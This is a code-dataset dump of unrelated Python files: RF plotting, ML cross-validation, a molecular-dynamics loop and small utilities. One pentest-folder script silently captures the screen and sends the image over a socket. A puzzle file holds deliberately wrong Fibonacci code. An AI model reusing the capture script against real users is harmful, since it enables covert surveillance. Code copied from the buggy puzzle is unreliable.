Default is None\n \\*args,\\*\\*kw : arguments, keyword arguments\n passed to :func:`~pylab.imshow`\n \"\"\"\n\n mat = npy.array([self[k].__getattribute__(component)[:, m, n] \\\n for k in range(len(self))])\n\n # if vmax is None:\n # vmax = 3*mat.mean()\n\n if vs_time:\n # create a datetime index\n dt_idx = [now_string_2_dt(k.name) for k in self]\n mpl_times = date2num(dt_idx)\n y_max = mpl_times[0]\n y_min = mpl_times[-1]\n\n else:\n y_min = len(self)\n y_max = 0\n\n # creates x and y scales\n freq = self[0].frequency\n extent = [freq.f_scaled[0], freq.f_scaled[-1], y_min, y_max]\n\n # set default imshow kwargs\n kw = {'extent': extent, 'aspect': 'auto', 'interpolation': 'nearest',\n 'vmax': vmax}\n # update the users kwargs\n kw.update(kwargs)\n img = plt.imshow(mat, *args, **kw)\n\n if vs_time:\n ax = plt.gca()\n ax.yaxis_date()\n # date_format = plt.DateFormatter('%M:%S.%f')\n # ax.yaxis.set_major_formatter(date_format)\n # cbar.set_label('Magnitude (dB)')\n plt.ylabel('Time')\n else:\n plt.ylabel('Network #')\n\n plt.grid(0)\n freq.labelXAxis()\n\n cbar = plt.colorbar()\n if cbar_label is not None:\n cbar.set_label(cbar_label)\n\n return img\n\ndef plot_circuit_graph(self, **kwargs):\n \"\"\"\n Plot the graph of the circuit using networkx drawing capabilities.\n\n Customisation options with default values:\n ::\n 'network_shape': 's'\n 'network_color': 'gray'\n 'network_size', 300\n 'network_fontsize': 7\n 'inter_shape': 'o'\n 'inter_color': 'lightblue'\n 'inter_size', 300\n 'port_shape': '>'\n 'port_color': 'red'\n 'port_size', 300\n 'port_fontsize': 7\n 'edges_fontsize': 5\n 'network_labels': False\n 'edge_labels': False\n 'inter_labels': False\n 'port_labels': False\n 'label_shift_x': 0\n 'label_shift_y': 0\n\n \"\"\"\n # Get the circuit graph. 
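# Minimal networkx sketch of the drawing pattern plot_circuit_graph uses below
# (spring layout, then separate node/edge/label draw calls); the graph contents
# are made up for illustration.
import networkx as nx
import matplotlib.pyplot as plt

G = nx.Graph([('port1', 'X0'), ('X0', 'ntwk_a'), ('ntwk_a', 'X1'), ('X1', 'port2')])
pos = nx.spring_layout(G)
nx.draw_networkx_nodes(G, pos, node_color='lightblue', node_size=300)
nx.draw_networkx_edges(G, pos)
nx.draw_networkx_labels(G, pos, font_size=7)
plt.axis('off')
plt.show()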
Will raise an error if the networkx package\n # is not installed.\n G = self.G\n\n # default values\n network_labels = kwargs.pop('network_labels', False)\n network_shape = kwargs.pop('network_shape', 's')\n network_color = kwargs.pop('network_color', 'gray')\n network_fontsize = kwargs.pop('network_fontsize', 7)\n network_size = kwargs.pop('network_size', 300)\n inter_labels = kwargs.pop('inter_labels', False)\n inter_shape = kwargs.pop('inter_shape', 'o')\n inter_color = kwargs.pop('inter_color', 'lightblue')\n inter_size = kwargs.pop('inter_size', 300)\n port_labels = kwargs.pop('port_labels', False)\n port_shape = kwargs.pop('port_shape', '>')\n port_color = kwargs.pop('port_color', 'red')\n port_size = kwargs.pop('port_size', 300)\n port_fontsize = kwargs.pop('port_fontsize', 7)\n edge_labels = kwargs.pop('edge_labels', False)\n edge_fontsize = kwargs.pop('edge_fontsize', 5)\n label_shift_x = kwargs.pop('label_shift_x', 0)\n label_shift_y = kwargs.pop('label_shift_y', 0)\n\n\n # sort between network nodes and port nodes\n all_ntw_names = [ntw.name for ntw in self.networks_list()]\n port_names = [ntw_name for ntw_name in all_ntw_names if 'port' in ntw_name]\n ntw_names = [ntw_name for ntw_name in all_ntw_names if 'port' not in ntw_name]\n # generate connecting nodes names\n int_names = ['X'+str(k) for k in range(self.connections_nb)]\n\n fig, ax = plt.subplots(figsize=(10,8))\n\n pos = nx.spring_layout(G)\n\n # draw Networks\n nx.draw_networkx_nodes(G, pos, port_names, ax=ax,\n node_size=port_size,\n node_color=port_color, node_shape=port_shape)\n nx.draw_networkx_nodes(G, pos, ntw_names, ax=ax,\n node_size=network_size,\n node_color=network_color, node_shape=network_shape)\n # draw intersections\n nx.draw_networkx_nodes(G, pos, int_names, ax=ax,\n node_size=inter_size,\n node_color=inter_color, node_shape=inter_shape)\n # labels shifts\n pos_labels = {}\n for node, coords in pos.items():\n pos_labels[node] = (coords[0] + label_shift_x,\n coords[1] + label_shift_y)\n\n # network labels\n if network_labels:\n network_labels = {lab:lab for lab in ntw_names}\n\n nx.draw_networkx_labels(G, pos_labels, labels=network_labels,\n font_size=network_fontsize, ax=ax)\n\n # intersection labels\n if inter_labels:\n inter_labels = {'X'+str(k):'X'+str(k) for k in range(self.connections_nb)}\n\n nx.draw_networkx_labels(G, pos_labels, labels=inter_labels,\n font_size=network_fontsize, ax=ax)\n\n # port labels\n if port_labels:\n port_labels = {lab:lab for lab in port_names}\n\n nx.draw_networkx_labels(G, pos_labels, labels=port_labels,\n font_size=port_fontsize, ax=ax)\n\n # draw edges\n nx.draw_networkx_edges(G, pos, ax=ax)\n if edge_labels:\n edge_labels = self.edge_labels\n nx.draw_networkx_edge_labels(G, pos,\n edge_labels=edge_labels, label_pos=0.5,\n font_size=edge_fontsize, ax=ax)\n # remove x and y axis and labels\n plt.axis('off')\n plt.tight_layout()\n\n\ndef plot_contour(freq: frequency.Frequency,\n x: NumberLike, y: NumberLike, z: NumberLike,\n min0max1: int, graph: bool = True,\n cmap: str = 'plasma_r', title: str = '',\n **kwargs):\n r\"\"\"\n Create a contour plot.\n\n Parameters\n ----------\n freq : :skrf.Frequency:\n Frequency object.\n x : array\n x points\n y : array\n y points.\n z : array\n z points.\n min0max1 : int\n 0 for min, 1 for max.\n graph : bool, optional\n plot graph if True. The default is True.\n cmap : str, optional\n Colormap label. The default is 'plasma_r'.\n title : str, optional\n Figure title. 
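# The interpolation core of plot_contour (whose body follows), in isolation:
# scattered (x, y, z) samples are regridded by linear triangulation; the sample
# data here is synthetic.
import numpy as np
import matplotlib.tri as tri

x = np.random.uniform(-1, 1, 200)
y = np.random.uniform(-1, 1, 200)
z = x**2 + y**2
Xi, Yi = np.meshgrid(np.linspace(-1, 1, 50), np.linspace(-1, 1, 50))
Zi = tri.LinearTriInterpolator(tri.Triangulation(x, y), z)(Xi, Yi)   # masked array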
The default is ''.\n \\*\\*kwargs : dict\n Other parameters passed to `matplotlib.plot()`.\n\n Returns\n -------\n GAMopt : :skrf.Network:\n Network\n VALopt : float\n min or max.\n\n \"\"\"\n ri = npy.linspace(0,1, 50)\n ti = npy.linspace(0,2*npy.pi, 150)\n Ri , Ti = npy.meshgrid(ri, ti)\n xi = npy.linspace(-1,1, 50)\n Xi, Yi = npy.meshgrid(xi, xi)\n triang = tri.Triangulation(x, y)\n interpolator = tri.LinearTriInterpolator(triang, z)\n Zi = interpolator(Xi, Yi)\n if min0max1 == 1 :\n VALopt = npy.max(z)\n else :\n VALopt = npy.min(z)\n GAMopt = network.Network(f=[freq], s=x[z==VALopt] +1j*y[z==VALopt])\n\n if graph :\n fig, ax = plt.subplots(**kwargs)\n an = npy.linspace(0, 2*npy.pi, 50)\n cs, sn = npy.cos(an), npy.sin(an)\n plt.plot(cs, sn, color='k', lw=0.25)\n plt.plot(cs, sn*0, color='g', lw=0.25)\n plt.plot((1+cs)/2, sn/2, color='k', lw=0.25)\n plt.axis('equal')\n ax.set_axis_off()\n ax.contour(Xi, Yi, Zi, levels=20, vmin=Zi.min(), vmax= Zi.max(), linewidths=0.5, colors='k')\n cntr1 = ax.contourf(Xi, Yi, Zi, levels=20, vmin=Zi.min(), vmax= Zi.max(),cmap=cmap)\n fig.colorbar(cntr1, ax=ax)\n ax.plot(x, y, 'o', ms=0.3, color='k')\n ax.set(xlim=(-1, 1), ylim=(-1, 1))\n plt.title(title)\n plt.show()\n return GAMopt, VALopt\n","sub_path":"skrf/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":80076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"343169236","text":"import csv\nimport io\nimport pkgutil\n\n\nclass SitesMeta:\n\n def __init__(self):\n self.data = self._get_sites_data()\n\n def get(self, place_id):\n state = place_id[:2]\n county = place_id[3:].replace('_', ' ')\n key = (state, county)\n return self.data[key]\n\n def get_url(self, state=None, county=None):\n key = (state, county)\n return self.data[key]['home_url']\n\n def _get_sites_data(self):\n try:\n return self._data\n except AttributeError:\n text = self._get_sites_csv_text()\n reader = csv.DictReader(\n io.StringIO(text)\n )\n data = {}\n for row in reader:\n state = row.pop('state')\n county = row.pop('county')\n key = (state, county)\n data[key] = row\n self._data = data\n return self._data\n\n def _get_sites_csv_text(self):\n return pkgutil.get_data(\n __name__,\n 'data/sites_meta.csv'\n ).decode('utf-8')\n","sub_path":"court_scraper/sites_meta.py","file_name":"sites_meta.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"590457910","text":"from numpy.lib.function_base import average\nimport pandas as pd\nimport numpy as np\n\nfrom modelos.classificador_bayesiano_parzen import ClassificadorBayesianoParzen\nfrom modelos.classificador_bayesiano import ClassificadorBayesiano\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import VotingClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import RepeatedStratifiedKFold\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score\nfrom statistics import mode\nimport time\nfrom utils import utils\nfrom configuracoes import conf\nfrom imblearn.over_sampling import SMOTE\n\nstart_time = time.time()\n\n# Importando a base de dados\ndados = utils.get_base_de_dados()\n\n# Rótulo da coluna com as classes\nclasses = conf.ROTULOS_ATRIBUTOS[len(conf.ROTULOS_ATRIBUTOS)-1]\ny = dados[classes]\ny = dados['SEQUENCE NAME']\n\nx = dados.drop([classes], axis=1)\n\n# 
Descomentar para realizar a validação cruzada com normalização\n#x = utils.normalizar_dados(x)\n\n# Descomentar para realizar a validação cruzada sem o atributo com correlação significativa\n#x = x.drop('GVH', axis=1)\n\n\ndef hyperparameter_tuning(model, x_train, y_train, x_valid, y_valid, hyper_set):\n\n n = len(hyper_set)\n rs = np.zeros((n,4))\n\n if model == 'KNN':\n for i in range(n):\n k = hyper_set[i]\n clf = KNeighborsClassifier(n_neighbors = k).fit(x_train, y_train)\n pred = clf.predict(x_valid)\n\n rs[i,0] = accuracy_score(y_valid, pred)\n rs[i,1] = precision_score(y_valid, pred, average = 'macro' )\n rs[i,2] = recall_score(y_valid, pred, average = 'macro')\n rs[i,3] = f1_score(y_valid, pred, average = 'macro')\n elif model == 'PARZEN':\n for i in range(n):\n h = hyper_set[i]\n clf = ClassificadorBayesianoParzen(h = h).fit(x_train, y_train)\n pred = clf.predict(x_valid)\n\n rs[i,0] = accuracy_score(y_valid, pred)\n rs[i,1] = precision_score(y_valid, pred, average = 'macro' )\n rs[i,2] = recall_score(y_valid, pred, average = 'macro')\n rs[i,3] = f1_score(y_valid, pred, average = 'macro')\n else:\n return('Error: choose another classifier')\n\n idm = rs.argmax(axis = 0)\n id_best = mode(idm)\n return hyper_set[id_best]\n\n\ner_matrix = pd.DataFrame(np.zeros((50,5)),columns = ['knn', 'parzen','bayesian','logistic','ensemble']) # Error classification \nprc_matrix = pd.DataFrame(np.zeros((50,5)),columns = ['knn', 'parzen','bayesian','logistic','ensemble']) # precision\nrcl_matrix = pd.DataFrame(np.zeros((50,5)),columns = ['knn', 'parzen','bayesian','logistic','ensemble']) # recall\nfms_matrix = pd.DataFrame(np.zeros((50,5)),columns = ['knn', 'parzen','bayesian','logistic','ensemble']) # fmeaseure\n\n# Set of hyperparameters for tuning\nkset = np.arange(1,38,2)\nhset = np.linspace(0.001, 1, num=19)\n\nbest_hyper = pd.DataFrame(np.zeros((50,2)), columns=['k','h'])\n\nrkf = RepeatedStratifiedKFold(n_splits = 5, n_repeats = 10, random_state=2601)\ni = 0\nfor train_index, test_index in rkf.split(x,y):\n\n x_train, x_test = x.iloc[train_index], x.iloc[test_index]\n y_train, y_test = y.iloc[train_index], y.iloc[test_index]\n \n # Descomentar para realizar o balanceamento das classes, pela classe minoritária\n #smote = SMOTE(k_neighbors=2, sampling_strategy='minority')\n #x_train, y_train = smote.fit_resample(x_train, y_train)\n\n ### tuning of parameters for KNN and Parzen\n x_treino, x_valid , y_treino, y_valid = train_test_split(x_train,y_train,test_size=0.20, \n random_state = 2601 + i, shuffle = True, stratify = y_train)\n k_best = hyperparameter_tuning('KNN', x_treino, y_treino, x_valid, y_valid, kset ) # KNN\n h_best = hyperparameter_tuning('PARZEN', x_treino, y_treino, x_valid, y_valid, hset ) # PARZEN\n best_hyper.iloc[i,0] = k_best\n best_hyper.iloc[i,1] = h_best\n\n\n # KNN\n knn_clf = KNeighborsClassifier(n_neighbors = k_best)\n knn = knn_clf.fit(x_train, y_train)\n pred_knn = knn.predict(x_test)\n er_matrix.iloc[i,0] = 1 - accuracy_score(y_test, pred_knn)\n prc_matrix.iloc[i,0] = precision_score(y_test, pred_knn, average = 'macro' )\n rcl_matrix.iloc[i,0] = recall_score(y_test, pred_knn, average = 'macro')\n fms_matrix.iloc[i,0] = f1_score(y_test, pred_knn, average = 'macro')\n\n # Parzen\n prz_clf = ClassificadorBayesianoParzen(h = h_best)\n prz = prz_clf.fit(x_train, y_train)\n pred_prz = prz.predict(x_test)\n er_matrix.iloc[i,1] = 1 - accuracy_score(y_test, pred_prz)\n prc_matrix.iloc[i,1] = precision_score(y_test, pred_prz, average = 'macro' )\n rcl_matrix.iloc[i,1] = 
recall_score(y_test, pred_prz, average = 'macro')\n fms_matrix.iloc[i,1] = f1_score(y_test, pred_prz, average = 'macro')\n\n # Bayesian Classifier\n bys_clf = ClassificadorBayesiano()\n bys = bys_clf.fit(x_train, y_train)\n pred_bys = bys.predict(x_test)\n er_matrix.iloc[i,2] = 1 - accuracy_score(y_test, pred_bys)\n prc_matrix.iloc[i,2] = precision_score(y_test, pred_bys, average = 'macro' )\n rcl_matrix.iloc[i,2] = recall_score(y_test, pred_bys, average = 'macro')\n fms_matrix.iloc[i,2] = f1_score(y_test, pred_bys, average = 'macro')\n\n # logistic regression\n lgr_clf = LogisticRegression(multi_class = 'ovr')\n lgr = lgr_clf.fit(x_train, y_train)\n pred_lgr = lgr.predict(x_test)\n er_matrix.iloc[i,3] = 1 - accuracy_score(y_test, pred_lgr)\n prc_matrix.iloc[i,3] = precision_score(y_test, pred_lgr, average = 'macro' )\n rcl_matrix.iloc[i,3] = recall_score(y_test, pred_lgr, average = 'macro')\n fms_matrix.iloc[i,3] = f1_score(y_test, pred_lgr, average = 'macro')\n\n # ensemble\n ens = VotingClassifier(estimators = [('knn',knn_clf), ('parzen',prz_clf), ('bayesian', bys_clf), ('logistic',lgr_clf)], voting ='hard').fit(x_train, y_train)\n pred_ens = ens.predict(x_test)\n er_matrix.iloc[i,4] = 1 - accuracy_score(y_test, pred_ens)\n prc_matrix.iloc[i,4] = precision_score(y_test, pred_ens, average = 'macro' )\n rcl_matrix.iloc[i,4] = recall_score(y_test, pred_ens, average = 'macro')\n fms_matrix.iloc[i,4] = f1_score(y_test, pred_ens, average = 'macro')\n\n print(i)\n i += 1\ner_matrix.to_csv('error_classification_normalized_only.csv',header = True, index = False)\nprc_matrix.to_csv('precision_normalized_only.csv',header = True, index = False)\nrcl_matrix.to_csv('recall_normalized_only.csv',header = True, index = False) \nfms_matrix.to_csv('fmeasure_normalized_only.csv',header = True, index = False) \nbest_hyper.to_csv('best_hyper_normalized_only.csv', header = True, index = False)\n\nprint(\" %.2f seconds \" % ( time.time() - start_time ) )","sub_path":"supervisionado/comparacao/cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309402428","text":"# __author__ = ‘penny‘\n#-*-coding:utf-8-*-\n\nfrom selenium import webdriver\nimport os,time,HTMLTestRunner\n\n#截图函数\ndef insert_img(driver, file_name):\n base_dir = os.path.dirname(os.path.dirname(__file__))\n base_dir = str(base_dir)\n base_dir = base_dir.replace('\\\\','/')\n base = base_dir.split('src')[0]\n file_path = base + \"report/image/\" + file_name\n driver.get_screenshot_as_file(file_path)\n\n\n#获得项目路径函数\ndef project_path():\n base_dir = os.path.dirname(__file__)\n base_dir = str(base_dir)\n base_dir = base_dir.replace('\\\\','/')\n base = base_dir.split('src')[0]\n print(base)\n return base\n\n\n\nif __name__ == '__main__':\n driver = webdriver.Chrome()\n driver.get(\"http://www.baidu.com\")\n insert_img(driver,'baidu.jpg')\n driver.quit()","sub_path":"src/test/common/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"196279081","text":"#Ah, dear niblets, here we are again. What, don't like that name either? You people are impossible to please.\r\n#I'll turn you over by the end of this, or my name isn't Quentinius Arvid Ulf Twaxtletus. 
Here, take your problem.\r\n#The Fibonacci series prints numbers as the sum of the preceding two digits, beginning in whole numbers. Much like me last night.\r\n#Remember, whole numbers. If the numbers are natural, and don't have wholes in them, they're not the Fibonacci series.\r\nnum = int(input(\"Enter number of digits you want in series (minimum 3): \"))\r\nfirst = 1\r\nsecond = 2 \r\nprint(\"\\nFibonacci series is:\")\r\nprint(\"{0}, {1}\".format(first, second), end = \", \")\r\nfor i in range(num):\r\n\tnext = first + second\r\n\tif i != num-1:\r\n\t\tprint(next, end=\", \")\r\n\t\tnext = next - 1\r\n\telse:\r\n\t\tprint(next)\r\n\tfirst = second - 1\r\n\tsecond = next","sub_path":"Programs/Round-Logical/Program 2 - Python.py","file_name":"Program 2 - Python.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"187061095","text":"from cherrypy import wsgiserver\n#This can be from cherrypy import wsgiserver if you're not running it standalone.\nimport os\nimport django.core.handlers.wsgi\n\nif __name__ == \"__main__\":\n os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'\n server = wsgiserver.CherryPyWSGIServer(\n ('0.0.0.0', 7000),\n django.core.handlers.wsgi.WSGIHandler(),\n server_name = 'localhost',\n numthreads = 50,\n )\n server.nodelay = False # socket.TCP_NODELAY is not supported in jyhont 2.5.2\n try:\n server.start()\n except KeyboardInterrupt:\n server.stop()\n","sub_path":"src/tweet_site/cherry.py","file_name":"cherry.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"604476470","text":"from fabric.api import sudo\n\nfrom . import system\nfrom .task import Task\n\n\n__all__ = ['add_ppa', 'install']\n\n\nclass AddPpa(Task):\n def do(self):\n if self.conf.os in ['lucid', 'maverick', 'natty']:\n sudo('add-apt-repository ppa:rwky/redis')\n system.aptitude_update.run(force=True)\n\nadd_ppa = AddPpa()\n\n\nclass Install(Task):\n def do(self):\n system.aptitude_install.run(packages='redis-server')\n\ninstall = Install()\n","sub_path":"fabdeploy/redis.py","file_name":"redis.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"250722298","text":"from socket import *\nimport pyautogui\n\ns = socket(2,1)\ns.connect((\"127.0.0.1\",4444))\nprint(\"connected\")\n\nscreenshot = pyautogui.screenshot()\nscreenshot.save(\"screen.png\")\n\nf = open(\"screen.png\",\"rb\")\ndata = memoryview(f.read())\ns.send(str(len(data)).encode())\nprint(s.recv(1024))\ns.send(data)\nf.close()\n\ns.close()\n","sub_path":"Pentest and Network/Socket/screenshot/screenshot_client.py","file_name":"screenshot_client.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"346387672","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nimport sys\nsys.path.append('../Esoinn')\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.spatial.distance import pdist,squareform\nfrom parmed.amber import AmberParm\nfrom parmed.amber import AmberMdcrd\nfrom parmed.amber import Rst7\nimport random\nimport pickle\nfrom multiprocessing import Queue,Process \nfrom .Thermostat import * \nfrom .analysis import * \nfrom ..Comparm import *\n\nclass Simulation():\n def __init__(self,sys,MD_setting):\n 
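# Hypothetical receiving side for the screenshot client record above: it reads
# the declared byte count, sends an acknowledgement, then collects exactly that
# many bytes before writing the file. Host/port mirror the client's hard-coded ones.
from socket import socket, AF_INET, SOCK_STREAM

srv = socket(AF_INET, SOCK_STREAM)
srv.bind(('127.0.0.1', 4444))
srv.listen(1)
conn, _ = srv.accept()
size = int(conn.recv(1024))   # the client sends str(len(data)) first
conn.send(b'OK')              # the client prints this acknowledgement
buf = b''
while len(buf) < size:
    chunk = conn.recv(4096)
    if not chunk:
        break
    buf += chunk
with open('received.png', 'wb') as f:
    f.write(buf)
conn.close()
srv.close()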
self.name=MD_setting.Name \n self.sys=sys\n self.path='./'+MD_setting.Name+'/' \n self.format=MD_setting.Mdformat\n self.T=MD_setting.Temp\n self.maxstep=MD_setting.Mdmaxsteps\n self.dt=MD_setting.Mddt\n self.icap=MD_setting.Icap\n self.ibox=MD_setting.Ibox\n self.box=MD_setting.Box \n self.center=MD_setting.Center \n self.radius=MD_setting.Capradius \n self.fcap=MD_setting.Capf\n self.MODE=MD_setting.Mode \n self.MDThermostat=MD_setting.Thermostat \n self.MDV0=MD_setting.Mdv0 \n self.stageindex=MD_setting.Stageindex\n self.Outfile=open(self.path+MD_setting.Name+'_%d.mdout'%self.stageindex,'w')\n self.Respfile=open(self.path+MD_setting.Name+'_%d.resp'%self.stageindex,'w')\n self.Nprint=MD_setting.Nprint\n return\n\n def MD(self,QMQueue=None):\n self.sys.Create_DisMap()\n self.sys.Update_DisMap()\n self.sys.update_crd()\n f,e,AVG_ERR,ERROR_mols,EGCMlist,chargestr=self.sys.Cal_EFQ()\n self.EPot0=e\n self.EPot=e\n self.EnergyStat=OnlineEstimator(self.EPot0) \n self.RealPot=0.0\n self.t=0.0\n self.KE=0.0\n self.atoms=self.sys.atoms\n self.m=np.array(list(map(lambda x:ATOMICMASSES[x-1],self.atoms)))\n self.x=self.sys.coords-self.sys.coords[self.center]\n self.v=np.zeros(self.x.shape)\n self.a=np.zeros(self.x.shape)\n self.f=f\n self.md_log=None\n if self.format==\"Amber\":\n self.trajectory=AmberMdcrd(self.path+self.name+'_%d.mdcrd'%self.stageindex,natom=self.sys.natom,hasbox=False,mode='w')\n self.restart=Rst7(natom=len(self.atoms))\n self.trajectory.add_coordinates(self.x)\n\n if self.MDV0==\"Random\":\n np.random.seed()\n self.v=np.random.randn(*self.x.shape)\n Tstat = Thermostat(self.m, self.v,self.T,self.dt)\n elif self.MDV0==\"Thermal\":\n self.v = np.random.normal(size=self.x.shape) * np.sqrt(1.38064852e-23 * self.T / self.m)[:,None]\n\n self.Tstat = None\n if (self.MDThermostat==\"Rescaling\"):\n self.Tstat = Thermo(self.m,self.v,self.T,self.dt)\n elif (self.MDThermostat==\"Andersen\"):\n self.Tstat = Andersen(self.m,self.v,self.T,self.dt)\n\n self.a=pow(10.0,-10.0)*np.einsum(\"ax,a->ax\", self.f, 1.0/self.m)\n if self.format==\"Amber\":\n self.restart.coordinates=self.x\n self.restart.vels=self.v\n \n step=0\n self.md_log=np.zeros((self.maxstep+1,7))\n res_order=np.array(range(1,self.sys.nres))\n ERROR=0\n ERROR_record=[]\n method_record=0\n Temp_record=[]\n MD_Flag=True\n while step < self.maxstep and MD_Flag:\n self.t+=self.dt\n t1=time.time()\n x_new=self.x+self.v*self.dt+0.5*self.a*self.dt**2\n #if self.icap==True:\n # x_new=x_new-x_new[self.center]\n self.sys.coords=x_new\n f=x_new;EPot=0;ERROR_mols=[]\n self.sys.Update_DisMap()\n self.sys.update_crd()\n f,EPot,ERROR,ERROR_mols,EGCMlist,chargestr=self.sys.Cal_EFQ()\n ERROR_record.append(ERROR)\n if self.sys.stepmethod=='Gaussian' and self.sys.Theroylevel=='NN':\n method_record+=1\n \n if self.MODE=='Train':\n if QMQueue!=None:\n QMQueue.put(ERROR_mols)\n self.EPot=EPot\n distozero=np.sqrt(np.sum(self.sys.coords**2,axis=1))\n if self.icap==True:\n #Vec=(self.sys.Distance_Matrix[self.center]-self.radius)/self.radius\n Vec=(distozero-self.radius)/self.radius\n for i in range(len(x_new)):\n if Vec[i]>0:\n tmpvec=(x_new[i])\n tmpvec=tmpvec/np.sqrt(np.sum(tmpvec**2))\n f[i]=f[i]-tmpvec*self.fcap*Vec[i]*JOULEPERHARTREE/627.51\n f[self.center]=f[self.center]-x_new[self.center]*10*Vec[self.center]*JOULEPERHARTREE/627.51\n a_new=pow(10.0,-10.0)*np.einsum(\"ax,a->ax\", f, 1.0/self.m)\n v_new=self.v+0.5*(self.a+a_new)*self.dt\n if self.MDThermostat!=None and step%1==0:\n v_new=self.Tstat.step(self.m,v_new,self.dt)\n self.a=a_new\n 
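# The position/velocity updates above are the velocity-Verlet scheme; distilled
# into a standalone step (names are illustrative):
#   x(t+dt) = x(t) + v(t)*dt + 0.5*a(t)*dt^2
#   v(t+dt) = v(t) + 0.5*(a(t) + a(t+dt))*dt
def verlet_step(x, v, a, accel_fn, dt):
    x_new = x + v * dt + 0.5 * a * dt**2
    a_new = accel_fn(x_new)               # forces evaluated at the new positions
    v_new = v + 0.5 * (a + a_new) * dt
    return x_new, v_new, a_new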
self.v=v_new\n self.x=x_new\n self.f=f\n self.md_log[step,0]=self.t\n self.md_log[step,4]=self.KE\n self.md_log[step,5]=self.EPot\n self.md_log[step,6]=self.KE+(self.EPot-self.EPot0)*JOULEPERHARTREE\n avE,Evar=self.EnergyStat(self.EPot)\n self.KE= KineticEnergy(self.v,self.m)\n Teff = (2./3.)*self.KE/IDEALGASR\n Temp_record.append(Teff)\n \n if (step%50==0 ):\n if self.format==\"Amber\":\n self.trajectory.add_coordinates(self.x)\n step+=1\n AVG_ERR=np.mean(np.array(ERROR_record[-1000:-1]))\n AVG_TEMP=np.mean(np.array(Temp_record[-1000:-1]))\n #if AVG_ERR>GPARAMS.Train_setting.rmse**2*GPARAMS.Train_setting.Modelnumperpoint*4:\n # MD_Flag=False\n #if method_record>2:\n # MD_Flag=False \n if AVG_TEMP>350:\n MD_Flag=False\n if (step%self.Nprint==0 ):\n if self.format==\"Amber\":\n if MD_Flag:\n self.restart.coordinates=self.x\n self.restart.vels=self.v\n self.restart.write(self.path+self.name+'_%d.rst7'%self.stageindex)\n self.steprecord=step\n else:\n file=open('%straj%d.trajin'%(self.path,self.stageindex),'w')\n file.write('trajin %s %d %d 1\\n'%(self.name+'_%d.mdcrd'%self.stageindex,0,math.ceil(self.steprecord,10)))\n file.write('trajout %s\\n' %(self.name+'_%d.mdcrd'%self.stageindex))\n os.system(\"cd %s && cpptraj -p %s < traj%d.trajin > traj%d.out && cd ..\"%(self.path,self.name+'.prmtop',self.stageindex,self.stageindex))\n if MD_Flag==True:\n self.Outfile.write(\"%s Step: %i time: %.1f(fs) KE(kJ): %.5f PotE(Eh): %.5f ETot(kJ/mol): %.5f Teff(K): %.5f MAX ERROR: %.3f Method: %s AVG_ERR: %f AVG_TEMP: %f \\n\"\\\n %(self.name, step, self.t, self.KE*len(self.m)/1000.0, self.EPot, self.KE*len(self.m)/1000.0+(self.EPot)*KJPERHARTREE, Teff,ERROR,self.sys.stepmethod,AVG_ERR,AVG_TEMP))\n self.Outfile.flush()\n self.Respfile.write(chargestr)\n self.Respfile.write(chargestr)\n else:\n self.Outfile.write(\"AVG ERR: %.3f , MD will stop~~!!\"%AVG_ERR)\n self.Outfile.flush()\n self.Outfile.close()\n self.Respfile.close()\n return \n\n","sub_path":"build/lib/ESOI_HDNN_MD/MD/MD.py","file_name":"MD.py","file_ext":"py","file_size_in_byte":7503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"452283092","text":"import numpy as np\r\nimport unicodedata\r\nimport datetime\r\n\r\nimport html2text\r\nfrom dateutil import parser\r\nimport dateparser\r\n\r\nimport torch\r\nimport re\r\n\r\nimport spacy\r\nnlp = spacy.load('en', disable=['parser', 'ner'])\r\n\r\ndef setseed(seed, opt):\r\n np.random.seed(seed)\r\n torch.manual_seed(seed)\r\n if opt['trainer']['cuda']:\r\n torch.cuda.manual_seed_all(seed)\r\n \r\ndef normalize_text(text):\r\n return unicodedata.normalize('NFD', text)\r\n\r\ndef html2text_(html):\r\n h = html2text.HTML2Text()\r\n h.ignore_links = True\r\n h.ignore_emphasis = True\r\n h.body_width = 0\r\n text = h.handle(html)\r\n text = text.strip('\\r\\n')\r\n return text\r\n \r\ndef text2words(opt, text):\r\n #this works better for imdb. 
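# Standalone sketch of the spaCy filtering that text2words applies below
# (assumes the spaCy 2.x 'en' model loaded at module top, where pronoun lemmas
# come back as '-PRON-'):
doc = nlp('The cats were sitting on the mat.')
words = [w.lemma_ if w.lemma_ != '-PRON-' else w.lower_
         for w in doc
         if not (w.is_space or w.is_bracket or w.is_punct or w.is_stop)]
# roughly ['cat', 'sit', 'mat'] with stop-word removal and lemmatization on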
